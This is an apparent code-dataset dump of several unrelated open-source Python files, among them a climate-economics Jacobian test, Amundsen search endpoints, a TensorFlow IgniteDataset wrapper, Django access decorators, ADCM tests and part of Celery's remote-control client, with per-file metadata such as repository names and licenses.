content
stringlengths 7
928k
| avg_line_length
float64 3.5
33.8k
| max_line_length
int64 6
139k
| alphanum_fraction
float64 0.08
0.96
| licenses
sequence | repository_name
stringlengths 7
104
| path
stringlengths 4
230
| size
int64 7
928k
| lang
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import unittest
import numpy as np
import pandas as pd
from os.path import join, dirname
from pandas import DataFrame, read_csv
from scipy.interpolate import interp1d
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from sos_trades_core.tests.core.abstract_jacobian_unit_test import AbstractJacobianUnittest
class ServicesJacobianDiscTest(AbstractJacobianUnittest):
#AbstractJacobianUnittest.DUMP_JACOBIAN = True
def setUp(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
self.year_start = 2020
self.year_end = 2050
self.time_step = 1
self.years = np.arange(self.year_start, self.year_end + 1, self.time_step)
self.nb_per = round((self.year_end - self.year_start) / self.time_step + 1)
# -------------------------
# input
data_dir = join(dirname(__file__), 'data')
global_data_dir = join(dirname(dirname(__file__)), 'data')
total_workforce_df = read_csv(join(data_dir, 'workingage_population_df.csv'))
total_workforce_df = total_workforce_df[total_workforce_df['years']<=self.year_end]
#multiply ageworking pop by employment rate and by % in services
workforce = total_workforce_df['population_1570']* 0.659 * 0.509
self.workforce_df = pd.DataFrame({'years': self.years, 'workforce': workforce})
#Energy_supply
brut_net = 1/1.45
share_indus = 0.37
#prepare energy df
energy_outlook = pd.DataFrame({
'year': [2010, 2017, 2018, 2025, 2030, 2035, 2040, 2050, 2060, 2100],
'energy': [149.483879, 162.7848774, 166.4685636, 180.7072889, 189.6932084, 197.8418842, 206.1201182, 220.000, 250.0, 300.0]})
f2 = interp1d(energy_outlook['year'], energy_outlook['energy'])
#Find values for 2020, 2050 and concat dfs
energy_supply = f2(np.arange(self.year_start, self.year_end+1))
energy_supply_values = energy_supply * brut_net * share_indus
energy_supply_df = pd.DataFrame({'years': self.years, 'Total production': energy_supply_values})
energy_supply_df.index = self.years
self.energy_supply_df = energy_supply_df
#energy_supply_df.loc[2020, 'Total production'] = 91.936
#Investment growth at 2%
init_value = 25
invest_serie = []
invest_serie.append(init_value)
for year in np.arange(1, self.nb_per):
invest_serie.append(invest_serie[year - 1] * 1.02)
self.total_invest = pd.DataFrame({'years': self.years, 'investment': invest_serie})
#damage
self.damage_df = pd.DataFrame({'years': self.years, 'damages': np.zeros(self.nb_per), 'damage_frac_output': np.zeros(self.nb_per),
'base_carbon_price': np.zeros(self.nb_per)})
self.damage_df.index = self.years
self.damage_df['damage_frac_output'] = 1e-2
def analytic_grad_entry(self):
return [
self.test_services_analytic_grad,
self.test_services_withotudamagetoproductivity
]
def test_services_analytic_grad(self):
self.model_name = 'Services'
ns_dict = {'ns_witness': f'{self.name}',
'ns_energy_mix': f'{self.name}',
'ns_public': f'{self.name}',
'ns_functions': f'{self.name}',
'ns_ref':f'{self.name}' }
self.ee.ns_manager.add_ns_def(ns_dict)
mod_path = 'climateeconomics.sos_wrapping.sos_wrapping_sectors.services.services_discipline.ServicesDiscipline'
builder = self.ee.factory.get_builder_from_module(
self.model_name, mod_path)
self.ee.factory.set_builders_to_coupling_builder(builder)
self.ee.configure()
self.ee.display_treeview_nodes()
inputs_dict = {f'{self.name}.year_start': self.year_start,
f'{self.name}.year_end': self.year_end,
f'{self.name}.time_step': self.time_step,
f'{self.name}.damage_to_productivity': True,
f'{self.name}.frac_damage_prod': 0.3,
f'{self.name}.energy_production': self.energy_supply_df,
f'{self.name}.damage_df': self.damage_df,
f'{self.name}.workforce_df': self.workforce_df,
f'{self.name}.sector_investment': self.total_invest,
f'{self.name}.alpha': 0.5
}
self.ee.load_study_from_input_dict(inputs_dict)
disc_techno = self.ee.root_process.sos_disciplines[0]
self.check_jacobian(location=dirname(__file__), filename=f'jacobian_services_discipline.pkl',
discipline=disc_techno, step=1e-15, derr_approx='complex_step',
inputs=[f'{self.name}.energy_production',
f'{self.name}.damage_df',
f'{self.name}.workforce_df',
f'{self.name}.sector_investment'],
outputs=[f'{self.name}.production_df',
f'{self.name}.capital_df',
f'{self.name}.emax_enet_constraint'])
def test_services_withotudamagetoproductivity(self):
self.model_name = 'Services'
ns_dict = {'ns_witness': f'{self.name}',
'ns_energy_mix': f'{self.name}',
'ns_public': f'{self.name}',
'ns_functions': f'{self.name}',
'ns_ref':f'{self.name}' }
self.ee.ns_manager.add_ns_def(ns_dict)
mod_path = 'climateeconomics.sos_wrapping.sos_wrapping_sectors.services.services_discipline.ServicesDiscipline'
builder = self.ee.factory.get_builder_from_module(
self.model_name, mod_path)
self.ee.factory.set_builders_to_coupling_builder(builder)
self.ee.configure()
self.ee.display_treeview_nodes()
inputs_dict = {f'{self.name}.year_start': self.year_start,
f'{self.name}.year_end': self.year_end,
f'{self.name}.time_step': self.time_step,
f'{self.name}.damage_to_productivity': False,
f'{self.name}.frac_damage_prod': 0.3,
f'{self.name}.energy_production': self.energy_supply_df,
f'{self.name}.damage_df': self.damage_df,
f'{self.name}.workforce_df': self.workforce_df,
f'{self.name}.sector_investment': self.total_invest,
f'{self.name}.alpha': 0.5
}
self.ee.load_study_from_input_dict(inputs_dict)
disc_techno = self.ee.root_process.sos_disciplines[0]
self.check_jacobian(location=dirname(__file__), filename=f'jacobian_services_discipline_withoutdamage.pkl',
discipline=disc_techno, step=1e-15, derr_approx='complex_step',
inputs=[f'{self.name}.energy_production',
f'{self.name}.damage_df',
f'{self.name}.workforce_df',
f'{self.name}.sector_investment'],
outputs=[f'{self.name}.production_df',
f'{self.name}.capital_df',
f'{self.name}.emax_enet_constraint'])
| 46.913793 | 138 | 0.60076 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | os-climate/witness-core | climateeconomics/tests/_l1_test_gradient_services_discipline.py | 8,163 | Python |
import logging
import json
from http import HTTPStatus
from typing import Any, Dict # noqa: F401
from flask import Response, jsonify, make_response, request
from flask import current_app as app
from flask.blueprints import Blueprint
from amundsen_application.log.action_log import action_logging
from amundsen_application.api.utils.request_utils import get_query_param, request_search
from amundsen_application.api.utils.search_utils import generate_query_json, has_filters, \
map_table_result, transform_filters
from amundsen_application.models.user import load_user, dump_user
LOGGER = logging.getLogger(__name__)
REQUEST_SESSION_TIMEOUT_SEC = 3
search_blueprint = Blueprint('search', __name__, url_prefix='/explore/api/search/v0')
SEARCH_TABLE_ENDPOINT = '/search'
SEARCH_TABLE_FILTER_ENDPOINT = '/search_table'
SEARCH_USER_ENDPOINT = '/search_user'
@search_blueprint.route('/table', methods=['POST'])
def search_table() -> Response:
"""
Parse the request arguments and call the helper method to execute a table search
:return: a Response created with the results from the helper method
"""
try:
request_json = request.get_json()
search_term = get_query_param(request_json, 'term', '"term" parameter expected in request data')
page_index = get_query_param(request_json, 'pageIndex', '"pageIndex" parameter expected in request data')
search_type = request_json.get('searchType')
transformed_filters = transform_filters(filters=request_json.get('filters', {}))
results_dict = _search_table(filters=transformed_filters,
search_term=search_term,
page_index=page_index,
search_type=search_type)
return make_response(jsonify(results_dict), results_dict.get('status_code', HTTPStatus.INTERNAL_SERVER_ERROR))
except Exception as e:
message = 'Encountered exception: ' + str(e)
logging.exception(message)
return make_response(jsonify(results_dict), HTTPStatus.INTERNAL_SERVER_ERROR)
@action_logging
def _search_table(*, search_term: str, page_index: int, filters: Dict, search_type: str) -> Dict[str, Any]:
"""
Call the search service endpoint and return matching results
Search service logic defined here:
https://github.com/lyft/amundsensearchlibrary/blob/master/search_service/api/table.py
:return: a json output containing search results array as 'results'
"""
# Default results
tables = {
'page_index': int(page_index),
'results': [],
'total_results': 0,
}
results_dict = {
'search_term': search_term,
'msg': '',
'tables': tables,
}
try:
if has_filters(filters=filters):
query_json = generate_query_json(filters=filters, page_index=page_index, search_term=search_term)
url_base = app.config['SEARCHSERVICE_BASE'] + SEARCH_TABLE_FILTER_ENDPOINT
response = request_search(url=url_base,
headers={'Content-Type': 'application/json'},
method='POST',
data=json.dumps(query_json))
else:
url_base = app.config['SEARCHSERVICE_BASE'] + SEARCH_TABLE_ENDPOINT
url = f'{url_base}?query_term={search_term}&page_index={page_index}'
response = request_search(url=url)
status_code = response.status_code
if status_code == HTTPStatus.OK:
results_dict['msg'] = 'Success'
results = response.json().get('results')
tables['results'] = [map_table_result(result) for result in results]
tables['total_results'] = response.json().get('total_results')
else:
message = 'Encountered error: Search request failed'
results_dict['msg'] = message
logging.error(message)
results_dict['status_code'] = status_code
return results_dict
except Exception as e:
message = 'Encountered exception: ' + str(e)
results_dict['msg'] = message
logging.exception(message)
return results_dict
@search_blueprint.route('/user', methods=['GET'])
def search_user() -> Response:
"""
Parse the request arguments and call the helper method to execute a user search
:return: a Response created with the results from the helper method
"""
try:
search_term = get_query_param(request.args, 'query', 'Endpoint takes a "query" parameter')
page_index = get_query_param(request.args, 'page_index', 'Endpoint takes a "page_index" parameter')
search_type = request.args.get('search_type')
results_dict = _search_user(search_term=search_term, page_index=page_index, search_type=search_type)
return make_response(jsonify(results_dict), results_dict.get('status_code', HTTPStatus.INTERNAL_SERVER_ERROR))
except Exception as e:
message = 'Encountered exception: ' + str(e)
logging.exception(message)
return make_response(jsonify(results_dict), HTTPStatus.INTERNAL_SERVER_ERROR)
@action_logging
def _search_user(*, search_term: str, page_index: int, search_type: str) -> Dict[str, Any]:
"""
Call the search service endpoint and return matching results
Search service logic defined here:
https://github.com/lyft/amundsensearchlibrary/blob/master/search_service/api/user.py
:return: a json output containing search results array as 'results'
"""
def _map_user_result(result: Dict) -> Dict:
user_result = dump_user(load_user(result))
user_result['type'] = 'user'
return user_result
users = {
'page_index': int(page_index),
'results': [],
'total_results': 0,
}
results_dict = {
'search_term': search_term,
'msg': 'Success',
'status_code': HTTPStatus.OK,
'users': users,
}
try:
url = '{0}?query_term={1}&page_index={2}'.format(app.config['SEARCHSERVICE_BASE'] + SEARCH_USER_ENDPOINT,
search_term,
page_index)
response = request_search(url=url)
status_code = response.status_code
if status_code == HTTPStatus.OK:
results_dict['msg'] = 'Success'
results = response.json().get('results')
users['results'] = [_map_user_result(result) for result in results]
users['total_results'] = response.json().get('total_results')
else:
message = 'Encountered error: Search request failed'
results_dict['msg'] = message
logging.error(message)
results_dict['status_code'] = status_code
return results_dict
except Exception as e:
message = 'Encountered exception: ' + str(e)
results_dict['msg'] = message
results_dict['status_code'] = HTTPStatus.INTERNAL_SERVER_ERROR
logging.exception(message)
return results_dict
# TODO - Implement
def _search_dashboard(*, search_term: str, page_index: int, filters: Dict, search_type: str) -> Dict[str, Any]:
return {}
| 38.389474 | 118 | 0.656019 | [
"Apache-2.0"
] | ai-platform/amundsenfrontendlibrary | amundsen_application/api/search/v0.py | 7,294 | Python |
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: gen_dataset_ops.cc
"""
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import errors as _errors
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.tf_export import kwarg_only as _kwarg_only
from tensorflow.tools.docs import doc_controls as _doc_controls
@_dispatch.add_dispatch_list
@tf_export('ignite_dataset')
def ignite_dataset(cache_name, host, port, local, part, page_size, schema, permutation, name=None):
r"""IgniteDataset that allows to get data from Apache Ignite.
Apache Ignite is a memory-centric distributed database, caching, and processing
platform for transactional, analytical, and streaming workloads, delivering
in-memory speeds at petabyte scale. This contrib package contains an
integration between Apache Ignite and TensorFlow. The integration is based on
tf.data from TensorFlow side and Binary Client Protocol from Apache Ignite side.
It allows to use Apache Ignite as a datasource for neural network training,
inference and all other computations supported by TensorFlow. Ignite Dataset
is based on Apache Ignite Binary Client Protocol.
Args:
cache_name: A `Tensor` of type `string`. Ignite Cache Name.
host: A `Tensor` of type `string`. Ignite Thin Client Host.
port: A `Tensor` of type `int32`. Ignite Thin Client Port.
local: A `Tensor` of type `bool`.
Local flag that defines that data should be fetched from local host only.
part: A `Tensor` of type `int32`. Partition data should be fetched from.
page_size: A `Tensor` of type `int32`. Page size for Ignite Thin Client.
schema: A `Tensor` of type `int32`.
Internal structure that defines schema of cache objects.
permutation: A `Tensor` of type `int32`.
Internal structure that defines permutation of cache objects.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"IgniteDataset", name, _ctx.post_execution_callbacks, cache_name,
host, port, local, part, page_size, schema, permutation)
return _result
except _core._FallbackException:
try:
return ignite_dataset_eager_fallback(
cache_name, host, port, local, part, page_size, schema,
permutation, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
ignite_dataset, cache_name=cache_name, host=host, port=port,
local=local, part=part, page_size=page_size,
schema=schema, permutation=permutation,
name=name)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
try:
_, _, _op = _op_def_lib._apply_op_helper(
"IgniteDataset", cache_name=cache_name, host=host, port=port,
local=local, part=part, page_size=page_size,
schema=schema, permutation=permutation, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
ignite_dataset, cache_name=cache_name, host=host, port=port,
local=local, part=part, page_size=page_size,
schema=schema, permutation=permutation, name=name)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"IgniteDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def IgniteDataset(cache_name, host, port, local, part, page_size, schema, permutation, name=None):
return ignite_dataset(cache_name=cache_name, host=host, port=port, local=local, part=part, page_size=page_size, schema=schema, permutation=permutation, name=name)
IgniteDataset.__doc__ = ignite_dataset.__doc__
IgniteDataset = _doc_controls.do_not_generate_docs(_kwarg_only(IgniteDataset))
tf_export("raw_ops.IgniteDataset")(IgniteDataset)
def ignite_dataset_eager_fallback(cache_name, host, port, local, part, page_size, schema, permutation, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function ignite_dataset
"""
_ctx = ctx if ctx else _context.context()
cache_name = _ops.convert_to_tensor(cache_name, _dtypes.string)
host = _ops.convert_to_tensor(host, _dtypes.string)
port = _ops.convert_to_tensor(port, _dtypes.int32)
local = _ops.convert_to_tensor(local, _dtypes.bool)
part = _ops.convert_to_tensor(part, _dtypes.int32)
page_size = _ops.convert_to_tensor(page_size, _dtypes.int32)
schema = _ops.convert_to_tensor(schema, _dtypes.int32)
permutation = _ops.convert_to_tensor(permutation, _dtypes.int32)
_inputs_flat = [cache_name, host, port, local, part, page_size, schema, permutation]
_attrs = None
_result = _execute.execute(b"IgniteDataset", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"IgniteDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
_ops.RegisterShape("IgniteDataset")(None)
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "IgniteDataset"
# input_arg {
# name: "cache_name"
# type: DT_STRING
# }
# input_arg {
# name: "host"
# type: DT_STRING
# }
# input_arg {
# name: "port"
# type: DT_INT32
# }
# input_arg {
# name: "local"
# type: DT_BOOL
# }
# input_arg {
# name: "part"
# type: DT_INT32
# }
# input_arg {
# name: "page_size"
# type: DT_INT32
# }
# input_arg {
# name: "schema"
# type: DT_INT32
# }
# input_arg {
# name: "permutation"
# type: DT_INT32
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
_op_def_lib = _InitOpDefLibrary(b"\n\203\001\n\rIgniteDataset\022\016\n\ncache_name\030\007\022\010\n\004host\030\007\022\010\n\004port\030\003\022\t\n\005local\030\n\022\010\n\004part\030\003\022\r\n\tpage_size\030\003\022\n\n\006schema\030\003\022\017\n\013permutation\030\003\032\n\n\006handle\030\025\210\001\001")
| 41.46114 | 318 | 0.724694 | [
"MIT"
] | aMp37/SimpleHTR | venv/lib/python3.7/site-packages/tensorflow_core/contrib/ignite/python/ops/gen_dataset_ops.py | 8,002 | Python |
import os
from typing import List
project_dir = os.path.abspath(os.path.dirname(__file__))
c_file_suffix = ('.c', '.cc', '.cpp')
def read_file(file_name: str) -> List[str]:
_f = open(file_name, 'r')
lines = _f.readlines()
_f.close()
return lines
| 20.384615 | 56 | 0.65283 | [
"MIT"
] | whbjzzwjxq/llvm-ir2json | utils.py | 265 | Python |
import functools
from django import http
from django.shortcuts import get_object_or_404, redirect
from conference import models, settings
def speaker_access(f): # pragma: no cover
"""
Decorator that protects the view relative to a speaker.
"""
@functools.wraps(f)
def wrapper(request, slug, **kwargs):
spk = get_object_or_404(models.Speaker, slug=slug)
if request.user.is_staff or request.user == spk.user:
full_access = True
talks = spk.talks()
else:
full_access = False
conf = models.Conference.objects.current()
if settings.VOTING_OPENED(conf, request.user):
if settings.VOTING_ALLOWED(request.user):
talks = spk.talks()
else:
if settings.VOTING_DISALLOWED:
return redirect(settings.VOTING_DISALLOWED)
else:
raise http.Http404()
else:
talks = spk.talks(status='accepted')
if talks.count() == 0:
raise http.Http404()
return f(request, slug, speaker=spk, talks=talks, full_access=full_access, **kwargs)
return wrapper
def talk_access(f): # pragma: no cover
"""
Decorator that protects the view relative to a talk.
"""
@functools.wraps(f)
def wrapper(request, slug, **kwargs):
tlk = get_object_or_404(models.Talk, slug=slug)
if request.user.is_anonymous():
full_access = False
elif request.user.is_staff:
full_access = True
else:
try:
tlk.get_all_speakers().get(user__id=request.user.id)
except (models.Speaker.DoesNotExist, models.Speaker.MultipleObjectsReturned):
# The MultipleObjectsReturned can happen if the user is not logged on and .id is None
full_access = False
else:
full_access = True
# if the talk is unconfirmed can access:
# * superusers or speakers (full access = True)
# * if the community voting is in progress who has the right to vote
if tlk.status == 'proposed' and not full_access:
conf = models.Conference.objects.current()
if not settings.VOTING_OPENED(conf, request.user):
return http.HttpResponseForbidden()
if not settings.VOTING_ALLOWED(request.user):
if settings.VOTING_DISALLOWED:
return redirect(settings.VOTING_DISALLOWED)
else:
return http.HttpResponseForbidden()
return f(request, slug, talk=tlk, full_access=full_access, **kwargs)
return wrapper
def profile_access(f): # pragma: no cover
"""
Decorator which protect the relative view to a profile.
"""
@functools.wraps(f)
def wrapper(request, slug, **kwargs):
try:
profile = models.AttendeeProfile.objects\
.select_related('user')\
.get(slug=slug)
except models.AttendeeProfile.DoesNotExist:
raise http.Http404()
if request.user.is_staff or request.user == profile.user:
full_access = True
else:
full_access = False
# if the profile belongs to a speaker with talk of "accepted" is visible
# whatever you say the same profile.
accepted = models.TalkSpeaker.objects\
.filter(speaker__user=profile.user)\
.filter(talk__status='accepted')\
.count()
if not accepted:
# if the community voting is open and the profile belongs to a speaker
# with the talk in the race page is visible
conf = models.Conference.objects.current()
if not (settings.VOTING_OPENED(conf, request.user) and settings.VOTING_ALLOWED(request.user)):
if profile.visibility == 'x':
return http.HttpResponseForbidden()
elif profile.visibility == 'm' and request.user.is_anonymous():
return http.HttpResponseForbidden()
return f(request, slug, profile=profile, full_access=full_access, **kwargs)
return wrapper | 39.706422 | 110 | 0.588031 | [
"BSD-2-Clause"
] | cezar77/epcon | conference/decorators.py | 4,328 | Python |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import allure
import coreapi
import pytest
from adcm_client.base import ActionHasIssues
from adcm_client.objects import ADCMClient
from adcm_pytest_plugin import utils
from tests.library.errorcodes import UPGRADE_ERROR
def test_action_should_not_be_run_while_cluster_has_an_issue(sdk_client_fs: ADCMClient):
bundle_path = utils.get_data_dir(__file__, "cluster")
bundle = sdk_client_fs.upload_from_fs(bundle_path)
cluster = bundle.cluster_create(name=utils.random_string())
with allure.step(f"Run action with error for cluster {cluster.name}"):
with pytest.raises(ActionHasIssues):
cluster.action(name="install").run()
def test_action_should_not_be_run_while_host_has_an_issue(sdk_client_fs: ADCMClient):
bundle_path = utils.get_data_dir(__file__, "host")
bundle = sdk_client_fs.upload_from_fs(bundle_path)
provider = bundle.provider_create(name=utils.random_string())
host = provider.host_create(fqdn=utils.random_string())
with allure.step(f"Run action with error for host {host.fqdn}"):
with pytest.raises(ActionHasIssues):
host.action(name="install").run()
def test_action_should_not_be_run_while_hostprovider_has_an_issue(
sdk_client_fs: ADCMClient,
):
bundle_path = utils.get_data_dir(__file__, "provider")
bundle = sdk_client_fs.upload_from_fs(bundle_path)
provider = bundle.provider_create(name=utils.random_string())
with allure.step(f"Run action with error for provider {provider.name}"):
with pytest.raises(ActionHasIssues):
provider.action(name="install").run()
def test_when_cluster_has_issue_than_upgrade_locked(sdk_client_fs: ADCMClient):
with allure.step("Create cluster and upload new one bundle"):
old_bundle_path = utils.get_data_dir(__file__, "cluster")
new_bundle_path = utils.get_data_dir(__file__, "upgrade", "cluster")
old_bundle = sdk_client_fs.upload_from_fs(old_bundle_path)
cluster = old_bundle.cluster_create(name=utils.random_string())
sdk_client_fs.upload_from_fs(new_bundle_path)
with allure.step("Upgrade cluster"):
with pytest.raises(coreapi.exceptions.ErrorMessage) as e:
cluster.upgrade().do()
with allure.step("Check if cluster has issues"):
UPGRADE_ERROR.equal(e, "cluster ", " has issue: ")
def test_when_hostprovider_has_issue_than_upgrade_locked(sdk_client_fs: ADCMClient):
with allure.step("Create hostprovider"):
old_bundle_path = utils.get_data_dir(__file__, "provider")
new_bundle_path = utils.get_data_dir(__file__, "upgrade", "provider")
old_bundle = sdk_client_fs.upload_from_fs(old_bundle_path)
provider = old_bundle.provider_create(name=utils.random_string())
sdk_client_fs.upload_from_fs(new_bundle_path)
with allure.step("Upgrade provider"):
with pytest.raises(coreapi.exceptions.ErrorMessage) as e:
provider.upgrade().do()
with allure.step("Check if upgrade locked"):
UPGRADE_ERROR.equal(e)
@allure.link("https://jira.arenadata.io/browse/ADCM-487")
def test_when_component_has_no_constraint_then_cluster_doesnt_have_issues(
sdk_client_fs: ADCMClient,
):
with allure.step("Create cluster (component has no constraint)"):
bundle_path = utils.get_data_dir(__file__, "cluster_component_hasnt_constraint")
bundle = sdk_client_fs.upload_from_fs(bundle_path)
cluster = bundle.cluster_create(name=utils.random_string())
cluster.service_add()
with allure.step("Run action: lock cluster"):
cluster.action(name="lock-cluster").run().try_wait()
with allure.step("Check if state is always-locked"):
cluster.reread()
assert cluster.state == "always-locked"
| 45.242105 | 88 | 0.746626 | [
"Apache-2.0"
] | AKhodus/adcm | tests/functional/test_objects_issues.py | 4,298 | Python |
# -*- coding: utf-8 -*-
"""Worker Remote Control Client.
Client for worker remote control commands.
Server implementation is in :mod:`celery.worker.control`.
"""
from __future__ import absolute_import, unicode_literals
import warnings
from billiard.common import TERM_SIGNAME
from kombu.matcher import match
from kombu.pidbox import Mailbox
from kombu.utils.compat import register_after_fork
from kombu.utils.functional import lazy
from kombu.utils.objects import cached_property
from celery.exceptions import DuplicateNodenameWarning
from celery.five import items
from celery.utils.log import get_logger
from celery.utils.text import pluralize
__all__ = ('Inspect', 'Control', 'flatten_reply')
logger = get_logger(__name__)
W_DUPNODE = """\
Received multiple replies from node {0}: {1}.
Please make sure you give each node a unique nodename using
the celery worker `-n` option.\
"""
def flatten_reply(reply):
"""Flatten node replies.
Convert from a list of replies in this format::
[{'[email protected]': reply},
{'[email protected]': reply}]
into this format::
{'[email protected]': reply,
'[email protected]': reply}
"""
nodes, dupes = {}, set()
for item in reply:
[dupes.add(name) for name in item if name in nodes]
nodes.update(item)
if dupes:
warnings.warn(DuplicateNodenameWarning(
W_DUPNODE.format(
pluralize(len(dupes), 'name'), ', '.join(sorted(dupes)),
),
))
return nodes
def _after_fork_cleanup_control(control):
try:
control._after_fork()
except Exception as exc: # pylint: disable=broad-except
logger.info('after fork raised exception: %r', exc, exc_info=1)
class Inspect(object):
"""API for app.control.inspect."""
app = None
def __init__(self, destination=None, timeout=1.0, callback=None,
connection=None, app=None, limit=None, pattern=None,
matcher=None):
self.app = app or self.app
self.destination = destination
self.timeout = timeout
self.callback = callback
self.connection = connection
self.limit = limit
self.pattern = pattern
self.matcher = matcher
def _prepare(self, reply):
if reply:
by_node = flatten_reply(reply)
if (self.destination and
not isinstance(self.destination, (list, tuple))):
return by_node.get(self.destination)
if self.pattern:
pattern = self.pattern
matcher = self.matcher
return {node: reply for node, reply in items(by_node)
if match(node, pattern, matcher)}
return by_node
def _request(self, command, **kwargs):
return self._prepare(self.app.control.broadcast(
command,
arguments=kwargs,
destination=self.destination,
callback=self.callback,
connection=self.connection,
limit=self.limit,
timeout=self.timeout, reply=True,
pattern=self.pattern, matcher=self.matcher,
))
def report(self):
return self._request('report')
def clock(self):
return self._request('clock')
def active(self, safe=None):
# safe is ignored since 4.0
# as no objects will need serialization now that we
# have argsrepr/kwargsrepr.
return self._request('active')
def scheduled(self, safe=None):
return self._request('scheduled')
def reserved(self, safe=None):
return self._request('reserved')
def stats(self):
return self._request('stats')
def revoked(self):
return self._request('revoked')
def registered(self, *taskinfoitems):
return self._request('registered', taskinfoitems=taskinfoitems)
registered_tasks = registered
def ping(self, destination=None):
return self._request('ping')
def active_queues(self):
return self._request('active_queues')
def query_task(self, *ids):
# signature used be unary: query_task(ids=[id1, id2])
# we need this to preserve backward compatibility.
if len(ids) == 1 and isinstance(ids[0], (list, tuple)):
ids = ids[0]
return self._request('query_task', ids=ids)
def conf(self, with_defaults=False):
return self._request('conf', with_defaults=with_defaults)
def hello(self, from_node, revoked=None):
return self._request('hello', from_node=from_node, revoked=revoked)
def memsample(self):
return self._request('memsample')
def memdump(self, samples=10):
return self._request('memdump', samples=samples)
def objgraph(self, type='Request', n=200, max_depth=10):
return self._request('objgraph', num=n, max_depth=max_depth, type=type)
class Control(object):
"""Worker remote control client."""
Mailbox = Mailbox
def __init__(self, app=None):
self.app = app
self.mailbox = self.Mailbox(
app.conf.control_exchange,
type='fanout',
accept=['json'],
producer_pool=lazy(lambda: self.app.amqp.producer_pool),
queue_ttl=app.conf.control_queue_ttl,
reply_queue_ttl=app.conf.control_queue_ttl,
queue_expires=app.conf.control_queue_expires,
reply_queue_expires=app.conf.control_queue_expires,
)
register_after_fork(self, _after_fork_cleanup_control)
def _after_fork(self):
del self.mailbox.producer_pool
@cached_property
def inspect(self):
return self.app.subclass_with_self(Inspect, reverse='control.inspect')
def purge(self, connection=None):
"""Discard all waiting tasks.
This will ignore all tasks waiting for execution, and they will
be deleted from the messaging server.
Arguments:
connection (kombu.Connection): Optional specific connection
instance to use. If not provided a connection will
be acquired from the connection pool.
Returns:
int: the number of tasks discarded.
"""
with self.app.connection_or_acquire(connection) as conn:
return self.app.amqp.TaskConsumer(conn).purge()
discard_all = purge
def election(self, id, topic, action=None, connection=None):
self.broadcast(
'election', connection=connection, destination=None,
arguments={
'id': id, 'topic': topic, 'action': action,
},
)
def revoke(self, task_id, destination=None, terminate=False,
signal=TERM_SIGNAME, **kwargs):
"""Tell all (or specific) workers to revoke a task by id.
If a task is revoked, the workers will ignore the task and
not execute it after all.
Arguments:
task_id (str): Id of the task to revoke.
terminate (bool): Also terminate the process currently working
on the task (if any).
signal (str): Name of signal to send to process if terminate.
Default is TERM.
See Also:
:meth:`broadcast` for supported keyword arguments.
"""
return self.broadcast('revoke', destination=destination, arguments={
'task_id': task_id,
'terminate': terminate,
'signal': signal,
}, **kwargs)
def terminate(self, task_id,
destination=None, signal=TERM_SIGNAME, **kwargs):
"""Tell all (or specific) workers to terminate a task by id.
See Also:
This is just a shortcut to :meth:`revoke` with the terminate
argument enabled.
"""
return self.revoke(
task_id,
destination=destination, terminate=True, signal=signal, **kwargs)
def ping(self, destination=None, timeout=1.0, **kwargs):
"""Ping all (or specific) workers.
Returns:
List[Dict]: List of ``{'hostname': reply}`` dictionaries.
See Also:
:meth:`broadcast` for supported keyword arguments.
"""
return self.broadcast(
'ping', reply=True, arguments={}, destination=destination,
timeout=timeout, **kwargs)
